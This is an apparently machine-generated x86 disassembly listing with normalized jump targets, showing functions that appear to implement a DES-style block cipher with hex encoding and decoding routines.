mov edx [ ebp - 0x674 ]
mov eax [ ebp - 0x674 ]
mov cl [ ebp + eax - 0x70 ]
mov [ ebp + edx - 0x950 ] cl
jmp r-xdata
lea ecx [ ebp - 0x630 ]
push ecx
lea edx [ ebp - 0x30 ]
push edx
call sub_401d47
add esp 0x8
mov [ ebp - 0x6c8 ] 0x0
jmp r-xdata
mov [ ebp - 0x6cc ] 0x0
jmp r-xdata
cmp [ ebp - 0x674 ] 0x20
jge r-xdata
mov ecx [ ebp - 0x674 ]
add ecx 0x1
mov [ ebp - 0x674 ] ecx
cmp [ ebp - 0x6c8 ] 0x8
jge r-xdata
cmp [ ebp - 0x6cc ] 0x6
jge r-xdata
lea eax [ ebp - 0x950 ]
push eax
call sub_4012dc
add esp 0x4
mov ecx [ ebp + 0x10 ]
push ecx
lea edx [ ebp - 0x950 ]
push edx
push 0x40
call sub_403488
add esp 0xc
pop esi
mov esp ebp
pop ebp
retn
mov eax [ ebp - 0x674 ]
mov ecx [ ebp - 0x674 ]
mov dl [ ebp + ecx - 0x70c ]
mov [ ebp + eax - 0x930 ] dl
jmp r-xdata
lea ecx [ ebp - 0x694 ]
push ecx
call sub_403210
add esp 0x4
mov [ ebp - 0x6c8 ] 0x0
jmp r-xdata
mov [ ebp - 0x6cc ] 0x0
jmp r-xdata
jmp r-xdata
mov eax [ ebp - 0x6c8 ]
imul eax eax 0x6
mov ecx [ ebp - 0x6cc ]
add ecx eax
movsx edx [ ebp + ecx - 0x6c4 ]
mov eax [ ebp - 0x674 ]
imul eax eax 0x30
lea ecx [ ebp + eax - 0x58c ]
mov eax [ ebp - 0x6c8 ]
imul eax eax 0x6
mov esi [ ebp - 0x6cc ]
add esi ecx
movsx ecx [ eax + esi ]
xor edx ecx
mov eax [ ebp - 0x6c8 ]
imul eax eax 0x6
lea ecx [ ebp + eax - 0x30 ]
mov eax [ ebp - 0x6cc ]
mov [ ecx + eax ] dl
jmp r-xdata
mov edx [ ebp - 0x674 ]
add edx 0x1
mov [ ebp - 0x674 ] edx
cmp [ ebp - 0x6c8 ] 0x20
jge r-xdata
cmp [ ebp - 0x6cc ] 0x4
jge r-xdata
mov ecx [ ebp - 0x6c8 ]
add ecx 0x1
mov [ ebp - 0x6c8 ] ecx
mov edx [ ebp - 0x6cc ]
add edx 0x1
mov [ ebp - 0x6cc ] edx
cmp [ ebp - 0x674 ] 0xf
je r-xdata
mov eax [ ebp - 0x6c8 ]
movsx ecx [ ebp + eax - 0x694 ]
mov edx [ ebp - 0x674 ]
shl edx 0x5
lea eax [ ebp + edx - 0x90c ]
mov edx [ ebp - 0x6c8 ]
movsx eax [ eax + edx ]
xor ecx eax
mov edx [ ebp - 0x674 ]
add edx 0x1
shl edx 0x5
lea eax [ ebp + edx - 0x270 ]
mov edx [ ebp - 0x6c8 ]
mov [ eax + edx ] cl
mov eax [ ebp - 0x674 ]
shl eax 0x5
lea ecx [ ebp + eax - 0x270 ]
mov edx [ ebp - 0x674 ]
add edx 0x1
shl edx 0x5
lea eax [ ebp + edx - 0x90c ]
mov edx [ ebp - 0x6c8 ]
mov esi [ ebp - 0x6c8 ]
mov cl [ ecx + esi ]
mov [ eax + edx ] cl
jmp r-xdata
jmp r-xdata
mov edx [ ebp - 0x6c8 ]
lea eax [ ebp + edx * 4 - 0x630 ]
mov ecx [ ebp - 0x6c8 ]
mov edx [ ebp - 0x6cc ]
lea ecx [ edx + ecx * 4 ]
mov edx [ ebp - 0x6cc ]
mov al [ eax + edx ]
mov [ ebp + ecx - 0x694 ] al
jmp r-xdata
mov [ ebp - 0x6c8 ] 0x0
jmp r-xdata
mov [ ebp - 0x6c8 ] 0x0
jmp r-xdata
mov edx [ ebp - 0x6c8 ]
add edx 0x1
mov [ ebp - 0x6c8 ] edx
mov eax [ ebp - 0x6c8 ]
add eax 0x1
mov [ ebp - 0x6c8 ] eax
mov ecx [ ebp - 0x6cc ]
add ecx 0x1
mov [ ebp - 0x6cc ] ecx
cmp [ ebp - 0x6c8 ] 0x20
jge r-xdata
cmp [ ebp - 0x6c8 ] 0x20
jge r-xdata
mov [ ebp - 0x6c8 ] 0x0
jmp r-xdata
mov eax [ ebp - 0x674 ]
add eax 0x1
shl eax 0x5
lea ecx [ ebp + eax - 0x270 ]
mov edx [ ebp - 0x6c8 ]
mov eax [ ebp - 0x6c8 ]
mov cl [ ecx + eax ]
mov [ ebp + edx - 0x950 ] cl
jmp r-xdata
mov [ ebp - 0x6c8 ] 0x0
jmp r-xdata
mov eax [ ebp - 0x674 ]
add eax 0x1
shl eax 0x5
lea ecx [ ebp + eax - 0x90c ]
mov edx [ ebp - 0x6c8 ]
mov eax [ ebp - 0x6c8 ]
mov cl [ ecx + eax ]
mov [ ebp + edx - 0x950 ] cl
jmp r-xdata
cmp [ ebp - 0x6c8 ] 0x20
jge r-xdata
mov edx [ ebp - 0x6c8 ]
add edx 0x1
mov [ ebp - 0x6c8 ] edx
cmp [ ebp - 0x6c8 ] 0x20
jge r-xdata
mov edx [ ebp - 0x6c8 ]
add edx 0x1
mov [ ebp - 0x6c8 ] edx
mov edx [ ebp + 0x10 ]
push edx
lea eax [ ebp - 0x950 ]
push eax
push 0x40
call sub_403488
add esp 0xc
jmp r-xdata
mov eax [ ebp - 0x674 ]
add eax 0x1
shl eax 0x5
lea ecx [ ebp + eax - 0x90c ]
mov edx [ ebp - 0x6c8 ]
mov eax [ ebp - 0x6c8 ]
mov cl [ ecx + eax ]
mov [ ebp + edx - 0x930 ] cl
jmp r-xdata
jmp r-xdata
mov eax [ ebp - 0x674 ]
add eax 0x1
shl eax 0x5
lea ecx [ ebp + eax - 0x270 ]
mov edx [ ebp - 0x6c8 ]
mov eax [ ebp - 0x6c8 ]
mov cl [ ecx + eax ]
mov [ ebp + edx - 0x930 ] cl
jmp r-xdata
mov eax [ ebp - 0x674 ]
add eax 0x1
mov [ ebp - 0x674 ] eax
mov edx [ ebp - 0x6c8 ]
add edx 0x1
mov [ ebp - 0x6c8 ] edx
mov edx [ ebp - 0x6c8 ]
add edx 0x1
mov [ ebp - 0x6c8 ] edx
sub_403f56
push ebp
mov ebp esp
sub esp 0x950
push esi
mov [ ebp - 0x910 ] 0x0
cmp [ ebp - 0x910 ] 0x10
jne r-xdata
mov edx [ ebp - 0x910 ]
add edx 0x1
mov [ ebp - 0x910 ] edx
jmp r-xdata
cmp [ ebp - 0x910 ] 0xe
jne r-xdata
mov [ ebp - 0x694 ] 0x0
jmp r-xdata
mov eax [ ebp + 0xc ]
add eax [ ebp - 0x910 ]
movsx ecx [ eax ]
test ecx ecx
je r-xdata
lea eax [ ebp - 0x5c8 ]
push eax
lea ecx [ ebp - 0x2ac ]
push ecx
lea edx [ ebp - 0x690 ]
push edx
call sub_4015b8
add esp 0xc
mov [ ebp - 0x694 ] 0x0
jmp r-xdata
mov [ ebp - 0x694 ] 0x0
jmp r-xdata
cmp [ ebp - 0x694 ] 0x10
jge r-xdata
cmp [ ebp - 0x694 ] 0x10
jge r-xdata
cmp [ ebp - 0x694 ] 0xe
jge r-xdata
mov [ ebp - 0x694 ] 0x0
jmp r-xdata
mov ecx [ ebp + 0xc ]
add ecx [ ebp - 0x694 ]
movsx edx [ ecx ]
cmp edx 0x39
jg r-xdata
mov [ ebp - 0x694 ] 0x0
jmp r-xdata
mov ecx [ ebp - 0x694 ]
mov edx [ ecx * 4 + rw-data ]
push edx
push 0x1c
lea eax [ ebp - 0x5c8 ]
push eax
lea ecx [ ebp - 0x2ac ]
push ecx
call sub_4018d0
add esp 0x10
mov [ ebp - 0x6e8 ] 0x0
jmp r-xdata
mov [ ebp - 0x910 ] 0x0
mov [ ebp - 0x694 ] 0x0
jmp r-xdata
mov eax [ ebp + 0xc ]
add eax [ ebp - 0x694 ]
movsx ecx [ eax ]
cmp ecx 0x39
jg r-xdata
cmp [ ebp - 0x694 ] 0x10
jge r-xdata
mov eax [ ebp + 0xc ]
add eax [ ebp - 0x694 ]
movsx ecx [ eax ]
sub ecx 0x57
mov edx [ ebp + 0xc ]
add edx [ ebp - 0x694 ]
mov [ edx ] cl
mov eax [ ebp + 0xc ]
add eax [ ebp - 0x694 ]
mov cl [ eax ]
sub cl 0x30
mov edx [ ebp + 0xc ]
add edx [ ebp - 0x694 ]
mov [ edx ] cl
jmp r-xdata
cmp [ ebp - 0x694 ] 0x10
jge r-xdata
cmp [ ebp - 0x6e8 ] 0x1c
jge r-xdata
cmp [ ebp - 0x694 ] 0x40
jge r-xdata
mov edx [ ebp + 0xc ]
add edx [ ebp - 0x694 ]
movsx eax [ edx ]
sub eax 0x57
mov ecx [ ebp + 0xc ]
add ecx [ ebp - 0x694 ]
mov [ ecx ] al
mov edx [ ebp + 0xc ]
add edx [ ebp - 0x694 ]
mov al [ edx ]
sub al 0x30
mov ecx [ ebp + 0xc ]
add ecx [ ebp - 0x694 ]
mov [ ecx ] al
jmp r-xdata
mov [ ebp - 0x6e8 ] 0x0
jmp r-xdata
mov eax [ ebp - 0x694 ]
add eax 0x1
mov [ ebp - 0x694 ] eax
jmp r-xdata
mov [ ebp - 0x694 ] 0x0
jmp r-xdata
mov edx [ ebp + 0x8 ]
add edx [ ebp - 0x694 ]
movsx eax [ edx ]
cmp eax 0x39
jg r-xdata
lea eax [ ebp - 0x5f8 ]
push eax
lea ecx [ ebp - 0x630 ]
push ecx
call sub_4019a3
add esp 0x8
mov [ ebp - 0x6e8 ] 0x0
jmp r-xdata
mov eax [ ebp - 0x6e8 ]
mov ecx [ ebp - 0x6e8 ]
mov dl [ ebp + ecx - 0x2ac ]
mov [ ebp + eax - 0x630 ] dl
mov eax [ ebp - 0x6e8 ]
mov ecx [ ebp - 0x6e8 ]
mov dl [ ebp + ecx - 0x5c8 ]
mov [ ebp + eax - 0x614 ] dl
jmp r-xdata
mov [ ebp - 0x694 ] 0x0
jmp r-xdata
mov eax [ ebp - 0x694 ]
mov [ ebp + eax - 0x690 ] 0x0
jmp r-xdata
mov edx [ ebp - 0x694 ]
add edx 0x1
mov [ ebp - 0x694 ] edx
jmp r-xdata
cmp [ ebp - 0x6e8 ] 0x4
jge r-xdata
cmp [ ebp - 0x694 ] 0x10
jge r-xdata
mov ecx [ ebp + 0x8 ]
add ecx [ ebp - 0x694 ]
movsx edx [ ecx ]
sub edx 0x57
mov eax [ ebp - 0x694 ]
mov [ ebp + eax - 0x950 ] dl
mov ecx [ ebp + 0x8 ]
add ecx [ ebp - 0x694 ]
movsx edx [ ecx ]
sub edx 0x30
mov eax [ ebp - 0x694 ]
mov [ ebp + eax - 0x950 ] dl
jmp r-xdata
cmp [ ebp - 0x6e8 ] 0x30
jge r-xdata
mov edx [ ebp - 0x6e8 ]
add edx 0x1
mov [ ebp - 0x6e8 ] edx
cmp [ ebp - 0x694 ] 0xe
jge r-xdata
mov edx [ ebp - 0x694 ]
add edx 0x1
mov [ ebp - 0x694 ] edx
jmp r-xdata
mov edx [ ebp + 0xc ]
add edx [ ebp - 0x694 ]
movsx eax [ edx ]
mov ecx 0x3
sub ecx [ ebp - 0x6e8 ]
sar eax cl
and eax 0x1
mov ecx [ ebp - 0x694 ]
mov edx [ ebp - 0x6e8 ]
lea ecx [ edx + ecx * 4 ]
mov [ ebp + ecx - 0x690 ] al
jmp r-xdata
lea ecx [ ebp - 0x40 ]
push ecx
call sub_401000
add esp 0x4
mov edx [ ebp + 0x10 ]
push edx
lea eax [ ebp - 0x40 ]
push eax
push 0x40
call sub_4034fe
add esp 0xc
mov [ ebp - 0x694 ] 0x0
jmp r-xdata
mov [ ebp - 0x6e8 ] 0x0
jmp r-xdata
mov ecx [ ebp - 0x694 ]
add ecx 0x1
mov [ ebp - 0x694 ] ecx
jmp r-xdata
jmp r-xdata
mov eax [ ebp - 0x694 ]
imul eax eax 0x30
lea ecx [ ebp + eax - 0x5ac ]
mov edx [ ebp - 0x6e8 ]
mov eax [ ebp - 0x6e8 ]
mov al [ ebp + eax - 0x5f8 ]
mov [ ecx + edx ] al
jmp r-xdata
mov [ ebp - 0x6e8 ] 0x0
jmp r-xdata
mov eax [ ebp - 0x694 ]
add eax 0x1
mov [ ebp - 0x694 ] eax
mov ecx [ ebp - 0x6e8 ]
add ecx 0x1
mov [ ebp - 0x6e8 ] ecx
cmp [ ebp - 0x694 ] 0x20
jge r-xdata
cmp [ ebp - 0x6e8 ] 0x4
jge r-xdata
mov eax [ ebp - 0x694 ]
add eax 0x1
mov [ ebp - 0x694 ] eax
mov edx [ ebp - 0x6e8 ]
add edx 0x1
mov [ ebp - 0x6e8 ] edx
cmp [ ebp - 0x6e8 ] 0x4
jge r-xdata
mov [ ebp - 0x694 ] 0x0
jmp r-xdata
mov edx [ ebp - 0x694 ]
mov eax [ ebp - 0x694 ]
mov cl [ ebp + eax - 0x40 ]
mov [ ebp + edx - 0x290 ] cl
mov edx [ ebp - 0x694 ]
mov eax [ ebp - 0x694 ]
mov cl [ ebp + eax - 0x20 ]
mov [ ebp + edx - 0x90c ] cl
jmp r-xdata
jmp r-xdata
mov eax [ ebp - 0x694 ]
movsx edx [ ebp + eax - 0x950 ]
mov ecx 0x3
sub ecx [ ebp - 0x6e8 ]
sar edx cl
and edx 0x1
mov eax [ ebp - 0x694 ]
mov ecx [ ebp - 0x6e8 ]
lea eax [ ecx + eax * 4 ]
mov [ ebp + eax - 0x40 ] dl
jmp r-xdata
jmp r-xdata
mov eax [ ebp + 0xc ]
add eax [ ebp - 0x694 ]
movsx edx [ eax ]
mov ecx 0x3
sub ecx [ ebp - 0x6e8 ]
sar edx cl
and edx 0x1
mov eax [ ebp - 0x694 ]
mov ecx [ ebp - 0x6e8 ]
lea eax [ ecx + eax * 4 ]
add eax [ ebp - 0x910 ]
mov [ ebp + eax - 0x690 ] dl
mov ecx [ ebp - 0x694 ]
mov edx [ ebp - 0x6e8 ]
lea eax [ edx + ecx * 4 + 0x1 ]
cdq
mov ecx 0x7
idiv ecx
test edx edx
jne r-xdata
cmp [ ebp - 0x694 ] 0x10
jge r-xdata
mov ecx [ ebp - 0x694 ]
add ecx 0x1
mov [ ebp - 0x694 ] ecx
mov ecx [ ebp - 0x694 ]
add ecx 0x1
mov [ ebp - 0x694 ] ecx
mov edx [ ebp - 0x6e8 ]
add edx 0x1
mov [ ebp - 0x6e8 ] edx
mov ecx [ ebp - 0x694 ]
add ecx 0x1
mov [ ebp - 0x694 ] ecx
jmp r-xdata
mov edx [ ebp - 0x910 ]
add edx 0x1
mov [ ebp - 0x910 ] edx
mov [ ebp - 0x694 ] 0x0
jmp r-xdata
mov [ ebp - 0x6e8 ] 0x0
jmp r-xdata
mov edx [ ebp - 0x6e8 ]
add edx 0x1
mov [ ebp - 0x6e8 ] edx
cmp [ ebp - 0x694 ] 0x20
jge r-xdata
cmp [ ebp - 0x6e8 ] 0x20
jge r-xdata
mov [ ebp - 0x694 ] 0x0
jmp r-xdata
mov edx [ ebp - 0x694 ]
mov eax [ ebp - 0x694 ]
mov cl [ ebp + eax - 0x70c ]
mov [ ebp + edx - 0x950 ] cl
jmp r-xdata
lea eax [ ebp - 0x6e4 ]
push eax
mov ecx [ ebp - 0x694 ]
add ecx 0x1
shl ecx 0x5
lea edx [ ebp + ecx - 0x290 ]
push edx
call sub_401b75
add esp 0x8
mov [ ebp - 0x6e8 ] 0x0
jmp r-xdata
mov ecx [ ebp - 0x694 ]
shl ecx 0x5
lea edx [ ebp + ecx - 0x90c ]
mov eax [ ebp - 0x694 ]
add eax 0x1
shl eax 0x5
lea ecx [ ebp + eax - 0x290 ]
mov eax [ ebp - 0x6e8 ]
mov esi [ ebp - 0x6e8 ]
mov dl [ edx + esi ]
mov [ ecx + eax ] dl
jmp r-xdata
cmp [ ebp - 0x694 ] 0x20
jge r-xdata
mov ecx [ ebp - 0x694 ]
add ecx 0x1
mov [ ebp - 0x694 ] ecx
cmp [ ebp - 0x6e8 ] 0x8
jge r-xdata
mov eax [ ebp - 0x6e8 ]
add eax 0x1
mov [ ebp - 0x6e8 ] eax
lea eax [ ebp - 0x950 ]
push eax
call sub_4012dc
add esp 0x4
mov ecx [ ebp + 0x10 ]
push ecx
lea edx [ ebp - 0x950 ]
push edx
push 0x40
call sub_4034fe
add esp 0xc
pop esi
mov esp ebp
pop ebp
retn
mov eax [ ebp - 0x694 ]
mov ecx [ ebp - 0x694 ]
mov dl [ ebp + ecx - 0x90 ]
mov [ ebp + eax - 0x930 ] dl
jmp r-xdata
lea eax [ ebp - 0x650 ]
push eax
lea ecx [ ebp - 0x70 ]
push ecx
call sub_401d47
add esp 0x8
mov [ ebp - 0x6e8 ] 0x0
jmp r-xdata
mov [ ebp - 0x6ec ] 0x0
jmp r-xdata
mov edx [ ebp - 0x694 ]
add edx 0x1
mov [ ebp - 0x694 ] edx
cmp [ ebp - 0x6e8 ] 0x8
jge r-xdata
cmp [ ebp - 0x6ec ] 0x6
jge r-xdata
lea eax [ ebp - 0x6b4 ]
push eax
call sub_403210
add esp 0x4
mov [ ebp - 0x6e8 ] 0x0
jmp r-xdata
mov [ ebp - 0x6ec ] 0x0
jmp r-xdata
jmp r-xdata
mov edx [ ebp - 0x6e8 ]
imul edx edx 0x6
mov eax [ ebp - 0x6ec ]
add eax edx
movsx ecx [ ebp + eax - 0x6e4 ]
mov edx 0xf
sub edx [ ebp - 0x694 ]
imul edx edx 0x30
lea eax [ ebp + edx - 0x5ac ]
mov edx [ ebp - 0x6e8 ]
imul edx edx 0x6
mov esi [ ebp - 0x6ec ]
add esi eax
movsx eax [ edx + esi ]
xor ecx eax
mov edx [ ebp - 0x6e8 ]
imul edx edx 0x6
lea eax [ ebp + edx - 0x70 ]
mov edx [ ebp - 0x6ec ]
mov [ eax + edx ] cl
jmp r-xdata
cmp [ ebp - 0x6e8 ] 0x20
jge r-xdata
cmp [ ebp - 0x6ec ] 0x4
jge r-xdata
mov eax [ ebp - 0x6e8 ]
add eax 0x1
mov [ ebp - 0x6e8 ] eax
mov ecx [ ebp - 0x6ec ]
add ecx 0x1
mov [ ebp - 0x6ec ] ecx
mov [ ebp - 0x6e8 ] 0x0
jmp r-xdata
mov edx [ ebp - 0x6e8 ]
movsx eax [ ebp + edx - 0x6b4 ]
mov ecx [ ebp - 0x694 ]
shl ecx 0x5
lea edx [ ebp + ecx - 0x290 ]
mov ecx [ ebp - 0x6e8 ]
movsx edx [ edx + ecx ]
xor eax edx
mov ecx [ ebp - 0x694 ]
add ecx 0x1
shl ecx 0x5
lea edx [ ebp + ecx - 0x90c ]
mov ecx [ ebp - 0x6e8 ]
mov [ edx + ecx ] al
jmp r-xdata
jmp r-xdata
mov ecx [ ebp - 0x6e8 ]
lea edx [ ebp + ecx * 4 - 0x650 ]
mov eax [ ebp - 0x6e8 ]
mov ecx [ ebp - 0x6ec ]
lea eax [ ecx + eax * 4 ]
mov ecx [ ebp - 0x6ec ]
mov dl [ edx + ecx ]
mov [ ebp + eax - 0x6b4 ] dl
jmp r-xdata
cmp [ ebp - 0x6e8 ] 0x20
jge r-xdata
mov ecx [ ebp - 0x6e8 ]
add ecx 0x1
mov [ ebp - 0x6e8 ] ecx
mov edx [ ebp - 0x6e8 ]
add edx 0x1
mov [ ebp - 0x6e8 ] edx
mov eax [ ebp - 0x6ec ]
add eax 0x1
mov [ ebp - 0x6ec ] eax
mov [ ebp - 0x6e8 ] 0x0
jmp r-xdata
mov eax [ ebp - 0x694 ]
shl eax 0x5
lea ecx [ ebp + eax - 0x90c ]
mov edx [ ebp - 0x6e8 ]
mov eax [ ebp - 0x6e8 ]
mov cl [ ecx + eax ]
mov [ ebp + edx - 0x950 ] cl
jmp r-xdata
cmp [ ebp - 0x6e8 ] 0x20
jge r-xdata
mov edx [ ebp - 0x6e8 ]
add edx 0x1
mov [ ebp - 0x6e8 ] edx
mov edx [ ebp + 0x10 ]
push edx
lea eax [ ebp - 0x950 ]
push eax
push 0x40
call sub_4034fe
add esp 0xc
jmp r-xdata
mov eax [ ebp - 0x694 ]
shl eax 0x5
lea ecx [ ebp + eax - 0x290 ]
mov edx [ ebp - 0x6e8 ]
mov eax [ ebp - 0x6e8 ]
mov cl [ ecx + eax ]
mov [ ebp + edx - 0x930 ] cl
jmp r-xdata
mov edx [ ebp - 0x694 ]
add edx 0x1
mov [ ebp - 0x694 ] edx
mov edx [ ebp - 0x6e8 ]
add edx 0x1
mov [ ebp - 0x6e8 ] edx
sub_40482f
push ebp
mov ebp esp
sub esp 0x5c
push esi
mov [ ebp - 0x54 ] 0x0
cmp [ ebp - 0x54 ] 0x2a
jne r-xdata
mov edx [ ebp - 0x54 ]
add edx 0x1
mov [ ebp - 0x54 ] edx
jmp r-xdata
cmp [ ebp - 0x54 ] 0x30
jne r-xdata
mov [ ebp - 0x5c ] 0xe
jmp r-xdata
mov eax [ ebp + 0xc ]
add eax [ ebp - 0x54 ]
movsx ecx [ eax ]
test ecx ecx
je r-xdata
mov [ ebp - 0x54 ] 0x0
jmp r-xdata
mov [ ebp - 0x5c ] 0x10
cmp [ ebp - 0x54 ] 0x3
jge r-xdata
mov ecx [ ebp + 0x10 ]
push ecx
lea edx [ ebp - 0x50 ]
push edx
mov eax [ ebp + 0x8 ]
push eax
call sub_403574
add esp 0xc
mov [ ebp - 0x54 ] 0x0
jmp r-xdata
mov [ ebp - 0x58 ] 0x0
jmp r-xdata
cmp [ ebp - 0x54 ] 0x10
jge r-xdata
mov edx [ ebp - 0x58 ]
cmp edx [ ebp - 0x5c ]
jge r-xdata
mov ecx [ ebp + 0x10 ]
mov [ ecx + 0x10 ] 0x0
lea edx [ ebp - 0x14 ]
push edx
lea eax [ ebp - 0x3c ]
push eax
mov ecx [ ebp + 0x10 ]
push ecx
call sub_403f56
add esp 0xc
mov [ ebp - 0x54 ] 0x0
jmp r-xdata
mov edx [ ebp + 0x10 ]
add edx [ ebp - 0x54 ]
movsx eax [ edx ]
cmp eax 0xa
jge r-xdata
mov ecx [ ebp - 0x54 ]
imul ecx ecx 0x14
lea edx [ ebp + ecx - 0x50 ]
mov eax [ ebp - 0x5c ]
mov [ edx + eax ] 0x0
jmp r-xdata
mov eax [ ebp - 0x54 ]
imul eax [ ebp - 0x5c ]
add eax [ ebp - 0x58 ]
mov ecx [ ebp - 0x54 ]
imul ecx ecx 0x14
lea edx [ ebp + ecx - 0x50 ]
mov ecx [ ebp - 0x58 ]
mov esi [ ebp + 0xc ]
mov al [ esi + eax ]
mov [ edx + ecx ] al
jmp r-xdata
cmp [ ebp - 0x54 ] 0x10
jge r-xdata
mov ecx [ ebp + 0x10 ]
add ecx [ ebp - 0x54 ]
movsx edx [ ecx ]
add edx 0x57
mov eax [ ebp + 0x10 ]
add eax [ ebp - 0x54 ]
mov [ eax ] dl
mov ecx [ ebp + 0x10 ]
add ecx [ ebp - 0x54 ]
movsx edx [ ecx ]
add edx 0x30
mov eax [ ebp + 0x10 ]
add eax [ ebp - 0x54 ]
mov [ eax ] dl
jmp r-xdata
mov eax [ ebp - 0x54 ]
add eax 0x1
mov [ ebp - 0x54 ] eax
mov ecx [ ebp - 0x58 ]
add ecx 0x1
mov [ ebp - 0x58 ] ecx
mov [ ebp - 0x4 ] 0x0
mov edx [ ebp + 0x10 ]
push edx
lea eax [ ebp - 0x28 ]
push eax
lea ecx [ ebp - 0x14 ]
push ecx
call sub_403574
add esp 0xc
mov [ ebp - 0x54 ] 0x0
jmp r-xdata
mov eax [ ebp - 0x54 ]
movsx ecx [ ebp + eax - 0x14 ]
cmp ecx 0xa
jge r-xdata
mov ecx [ ebp - 0x54 ]
add ecx 0x1
mov [ ebp - 0x54 ] ecx
jmp r-xdata
cmp [ ebp - 0x54 ] 0x10
jge r-xdata
mov edx [ ebp - 0x54 ]
movsx eax [ ebp + edx - 0x14 ]
add eax 0x57
mov ecx [ ebp - 0x54 ]
mov [ ebp + ecx - 0x14 ] al
mov edx [ ebp - 0x54 ]
movsx eax [ ebp + edx - 0x14 ]
add eax 0x30
mov ecx [ ebp - 0x54 ]
mov [ ebp + ecx - 0x14 ] al
jmp r-xdata
mov edx [ ebp + 0x10 ]
mov [ edx + 0x10 ] 0x0
pop esi
mov esp ebp
pop ebp
retn
mov eax [ ebp + 0x10 ]
add eax [ ebp - 0x54 ]
movsx ecx [ eax ]
cmp ecx 0xa
jge r-xdata
mov edx [ ebp - 0x54 ]
add edx 0x1
mov [ ebp - 0x54 ] edx
jmp r-xdata
mov edx [ ebp + 0x10 ]
add edx [ ebp - 0x54 ]
movsx eax [ edx ]
add eax 0x57
mov ecx [ ebp + 0x10 ]
add ecx [ ebp - 0x54 ]
mov [ ecx ] al
mov edx [ ebp + 0x10 ]
add edx [ ebp - 0x54 ]
movsx eax [ edx ]
add eax 0x30
mov ecx [ ebp + 0x10 ]
add ecx [ ebp - 0x54 ]
mov [ ecx ] al
jmp r-xdata
mov edx [ ebp - 0x54 ]
add edx 0x1
mov [ ebp - 0x54 ] edx
jmp r-xdata
sub_404a1c
push ebp
mov ebp esp
sub esp 0x5c
push esi
mov [ ebp - 0x54 ] 0x0
cmp [ ebp - 0x54 ] 0x2a
jne r-xdata
mov edx [ ebp - 0x54 ]
add edx 0x1
mov [ ebp - 0x54 ] edx
jmp r-xdata
cmp [ ebp - 0x54 ] 0x30
jne r-xdata
mov [ ebp - 0x5c ] 0xe
jmp r-xdata
mov eax [ ebp + 0xc ]
add eax [ ebp - 0x54 ]
movsx ecx [ eax ]
test ecx ecx
je r-xdata
mov [ ebp - 0x54 ] 0x0
jmp r-xdata
mov [ ebp - 0x5c ] 0x10
cmp [ ebp - 0x54 ] 0x3
jge r-xdata
mov ecx [ ebp + 0x10 ]
push ecx
lea edx [ ebp - 0x50 ]
push edx
mov eax [ ebp + 0x8 ]
push eax
call sub_403f56
add esp 0xc
mov [ ebp - 0x54 ] 0x0
jmp r-xdata
mov [ ebp - 0x58 ] 0x0
jmp r-xdata
cmp [ ebp - 0x54 ] 0x10
jge r-xdata
mov edx [ ebp - 0x58 ]
cmp edx [ ebp - 0x5c ]
jge r-xdata
mov ecx [ ebp + 0x10 ]
mov [ ecx + 0x10 ] 0x0
lea edx [ ebp - 0x14 ]
push edx
lea eax [ ebp - 0x3c ]
push eax
mov ecx [ ebp + 0x10 ]
push ecx
call sub_403574
add esp 0xc
mov [ ebp - 0x54 ] 0x0
jmp r-xdata
mov edx [ ebp + 0x10 ]
add edx [ ebp - 0x54 ]
movsx eax [ edx ]
cmp eax 0xa
jge r-xdata
mov ecx [ ebp - 0x54 ]
imul ecx ecx 0x14
lea edx [ ebp + ecx - 0x50 ]
mov eax [ ebp - 0x5c ]
mov [ edx + eax ] 0x0
jmp r-xdata
mov eax [ ebp - 0x54 ]
imul eax [ ebp - 0x5c ]
add eax [ ebp - 0x58 ]
mov ecx [ ebp - 0x54 ]
imul ecx ecx 0x14
lea edx [ ebp + ecx - 0x50 ]
mov ecx [ ebp - 0x58 ]
mov esi [ ebp + 0xc ]
mov al [ esi + eax ]
mov [ edx + ecx ] al
jmp r-xdata
cmp [ ebp - 0x54 ] 0x10
jge r-xdata
mov ecx [ ebp + 0x10 ]
add ecx [ ebp - 0x54 ]
movsx edx [ ecx ]
add edx 0x57
mov eax [ ebp + 0x10 ]
add eax [ ebp - 0x54 ]
mov [ eax ] dl
mov ecx [ ebp + 0x10 ]
add ecx [ ebp - 0x54 ]
movsx edx [ ecx ]
add edx 0x30
mov eax [ ebp + 0x10 ]
add eax [ ebp - 0x54 ]
mov [ eax ] dl
jmp r-xdata
mov eax [ ebp - 0x54 ]
add eax 0x1
mov [ ebp - 0x54 ] eax
mov ecx [ ebp - 0x58 ]
add ecx 0x1
mov [ ebp - 0x58 ] ecx
mov [ ebp - 0x4 ] 0x0
mov edx [ ebp + 0x10 ]
push edx
lea eax [ ebp - 0x28 ]
push eax
lea ecx [ ebp - 0x14 ]
push ecx
call sub_403f56
add esp 0xc
mov [ ebp - 0x54 ] 0x0
jmp r-xdata
mov eax [ ebp - 0x54 ]
movsx ecx [ ebp + eax - 0x14 ]
cmp ecx 0xa
jge r-xdata
mov ecx [ ebp - 0x54 ]
add ecx 0x1
mov [ ebp - 0x54 ] ecx
jmp r-xdata
cmp [ ebp - 0x54 ] 0x10
jge r-xdata
mov edx [ ebp - 0x54 ]
movsx eax [ ebp + edx - 0x14 ]
add eax 0x57
mov ecx [ ebp - 0x54 ]
mov [ ebp + ecx - 0x14 ] al
mov edx [ ebp - 0x54 ]
movsx eax [ ebp + edx - 0x14 ]
add eax 0x30
mov ecx [ ebp - 0x54 ]
mov [ ebp + ecx - 0x14 ] al
jmp r-xdata
mov edx [ ebp + 0x10 ]
mov [ edx + 0x10 ] 0x0
pop esi
mov esp ebp
pop ebp
retn
mov eax [ ebp + 0x10 ]
add eax [ ebp - 0x54 ]
movsx ecx [ eax ]
cmp ecx 0xa
jge r-xdata
mov edx [ ebp - 0x54 ]
add edx 0x1
mov [ ebp - 0x54 ] edx
jmp r-xdata
mov edx [ ebp + 0x10 ]
add edx [ ebp - 0x54 ]
movsx eax [ edx ]
add eax 0x57
mov ecx [ ebp + 0x10 ]
add ecx [ ebp - 0x54 ]
mov [ ecx ] al
mov edx [ ebp + 0x10 ]
add edx [ ebp - 0x54 ]
movsx eax [ edx ]
add eax 0x30
mov ecx [ ebp + 0x10 ]
add ecx [ ebp - 0x54 ]
mov [ ecx ] al
jmp r-xdata
mov edx [ ebp - 0x54 ]
add edx 0x1
mov [ ebp - 0x54 ] edx
jmp r-xdata
sub_404c09
push ebp
mov ebp esp
sub esp 0x30
push esi
mov [ ebp - 0x1c ] 0x0
mov eax [ ebp - 0x1c ]
push eax
push rw-data
call printf
add esp 0x8
mov ecx [ ebp - 0x1c ]
and ecx 0x8000000f
jns r-xdata
